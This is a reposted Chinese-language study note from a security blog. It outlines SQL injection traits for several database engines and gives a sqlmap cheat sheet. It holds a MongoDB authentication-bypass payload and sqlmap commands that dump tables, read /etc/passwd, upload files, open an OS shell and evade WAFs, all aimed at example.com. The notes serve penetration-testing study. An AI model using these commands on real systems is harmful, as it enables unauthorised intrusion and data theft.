- 通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
- 数据库类型
- ACCESS
- 特性
- 没数据库用户
- 没数据库权限
- 没数据库查询参数
- 没有高权限注入说法
- 暴力猜解,借助字典得到数据
- 注入方式
- 联合注入
- 偏移注入
- 表名列名猜解不到
- 偏移注入
- 特性
- MySQL
- 低权限
- 常规注入
- 高权限
- 常规注入
- 文件读取
- load_file
- 文件写入
- into outfile
- 权限原因&判断
- 代码连接用户决定
- 查询函数user()
- 其他
- database()
- version()
- @@version_compile_os
- 低权限
- MSSQL
- 低权限
- 常规注入
- 高权限
- 常规注入
- 文件读取
- 文件读写
- 命令执行
- 注册表读取
- 权限原因&判断
- 代码连接用户决定
- 查询函数-user()
- 其他
- db_name() 当前数据库名字
- @@version 获取版本信息
- @@SERVERNAME 获取服务器主机信息
- 低权限
- postgreSQL
- 低权限
- 常规注入
- 高权限
- 参考:https://www.freebuf.com/sectool/2493721.html
- 常规注入
- 文件读取
- 文件写入
- 权限原因&判断
- 代码连接用户决定
- 查询函数current_user
- 其他
- version()
- current_database()
- 低权限
- db2
- 特性:
- 数据库结构复杂,表名和列名通常需要猜解。
- 高权限用户可以通过 LOAD 和 CALL 执行系统命令。
- 注入方式:
- 联合注入:通过 UNION SELECT 获取数据。
- 报错注入:通过 XMLQUERY 等函数触发报错。
- 权限判断:
- 使用 SELECT user FROM sysibm.sysdummy1 查询当前用户。
- 使用 SELECT * FROM sysibm.sysversions 查询数据库版本。
- 特性:
- sybase
- Sybase 的基本特点
- 支持标准的 SQL 语法。
- 支持存储过程、触发器等高级功能。
- 数据库结构包括数据库、表、视图、存储过程等。
- 2. Sybase 的权限模型
- 高权限用户(如 sa)可以执行系统命令、读写文件等操作。
- 低权限用户只能访问特定的数据库对象。
- Sybase 的权限分为数据库用户和角色。
- Sybase 的基本特点
- oracle
- 特性:
- 数据库结构复杂,表名和列名通常需要猜解。
- 高权限用户可以通过 UTL_FILE 读写文件。
- 注入方式:
- 联合注入:通过 UNION SELECT 获取数据。
- 报错注入:通过 ctxsys.drithsx.sn 等函数触发报错。
- 权限判断:
- 使用 SELECT user FROM dual 查询当前用户。
- 使用 SELECT * FROM v$version 查询数据库版本。
- 特性:
- mangodb
- 特性:
- NoSQL 数据库,不支持传统 SQL 注入。
- 可能存在 NoSQL 注入漏洞,通常通过 JSON 查询注入。
- 注入方式:
- 通过修改 JSON 查询条件,绕过身份验证或获取数据。
- { "username": {"$ne": ""}, "password": {"$ne": ""} }
- 特性:
- ACCESS
- 注入神器
- SQLMAP
- 文档介绍 | sqlmap 用户手册
- 常见参数
- 1. 指定目标
- --data:指定 POST 请求的数据。
- sqlmap -u "http://example.com/login" --data="username=admin&password=123"
- --cookie:指定 Cookie。
- sqlmap -u "http://example.com/page?id=1" --cookie="sessionid=12345"
- -u 或 --url:指定目标 URL。
- sqlmap -u "http://example.com/page?id=1"
- --data:指定 POST 请求的数据。
- 2. 指定注入点
- --skip:跳过某些参数的测试。
- sqlmap -u "http://example.com/page?id=1&name=test" --skip="name"
- -p:指定需要测试的参数。
- sqlmap -u "http://example.com/page?id=1&name=test" -p "id"
- --skip:跳过某些参数的测试。
- 3. 指定数据库类型
- --dbms:指定目标数据库类型(如 MySQL、Oracle、PostgreSQL 等)。
- sqlmap -u "http://example.com/page?id=1" --dbms=MySQL
- --dbms:指定目标数据库类型(如 MySQL、Oracle、PostgreSQL 等)。
- 4. 获取数据库信息
- --current-db:获取当前数据库名称。
- sqlmap -u "http://example.com/page?id=1" --current-db
- --tables:枚举指定数据库的表。
- sqlmap -u "http://example.com/page?id=1" -D database_name --tables
- --dbs:枚举所有数据库。
- sqlmap -u "http://example.com/page?id=1" --dbs
- --columns:枚举指定表的列。
- sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns
- --dump:导出表数据。
- sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
- --current-db:获取当前数据库名称。
- 5. 高级功能
- --risk:设置风险等级(1-3,默认 1),风险越高,测试越激进。
- sqlmap -u "http://example.com/page?id=1" --risk=2
- --threads:设置并发线程数。
- sqlmap -u "http://example.com/page?id=1" --threads=5
- --batch:自动选择默认选项,无需用户交互。
- sqlmap -u "http://example.com/page?id=1" --batch
- --level:设置测试等级(1-5,默认 1),等级越高,测试越全面。
- sqlmap -u "http://example.com/page?id=1" --level=3
- --risk:设置风险等级(1-3,默认 1),风险越高,测试越激进。
- 6. 文件加载
- -l:从日志文件中加载目标。
- sqlmap -l logfile.txt
- -r:从文件中加载 HTTP 请求。
- sqlmap -r request.txt
- -l:从日志文件中加载目标。
- 7. 绕过 WAF/IDS
- --tamper:使用脚本绕过 WAF(Web 应用防火墙)或 IDS(入侵检测系统)。
- sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
- --tamper:使用脚本绕过 WAF(Web 应用防火墙)或 IDS(入侵检测系统)。
- 8. 其他常用参数
- --sql-shell:获取 SQL 交互式 shell。
- sqlmap -u "http://example.com/page?id=1" --sql-shell
- --file-read:读取服务器上的文件。
- sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
- --file-write 和 --file-dest:上传文件到服务器。
- sqlmap -u "http://example.com/page?id=1" --file-write="local_file" --file-dest="/remote/path"
- --os-shell:尝试获取操作系统的 shell。
- sqlmap -u "http://example.com/page?id=1" --os-shell
- --sql-shell:获取 SQL 交互式 shell。
- 示例 1:检测注入点
- sqlmap -u "http://example.com/page?id=1"
- 示例 2:枚举数据库
- sqlmap -u "http://example.com/page?id=1" --dbs
- 示例 3:导出表数据
- sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
- 示例 4:获取操作系统 shell
- sqlmap -u "http://example.com/page?id=1" --os-shell
- 示例 5:绕过 WAF
- sqlmap -u "http://example.com/page?id=1" --tamper=space2comment --level=5 --risk=3
- 1. 指定目标
- SQLMAP
- 数据库类型
网络安全之攻防笔记--通用安全漏洞SQL注入sqlmapOraclemongodbDB2
2025/2/24 6:38:26
来源:https://blog.csdn.net/Dawndddddd/article/details/145815854
浏览:
次
关键词:网络安全之攻防笔记--通用安全漏洞SQL注入sqlmapOraclemongodbDB2
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com
热文排行
- 华为 海思22AP10(SS524)H.265 编解码处理器用户指南
- 数据库物理结构设计
- 如何在 Mac 上清空硬盘后恢复丢失的数据?
- npm install puppeteer 报错 npm ERR! PUPPETEER_DOWNLOAD_HOST is deprecated解决办法
- 基于重要抽样的主动学习不平衡分类方法ALIS
- 《缺失MRI模态下的脑肿瘤分割的潜在相关表示学习》| 文献速递-深度学习肿瘤自动分割
- 大模型分离架构学习记录
- (2)Django生产环境数据库的切换以及环境配置python-dotenv方案
- 【微信小程序】自定义组件 - 组件的生命周期
- vue项目——页面绑定回车Enter事件,进入页面路由和离开页面路由解绑事件——js技能提升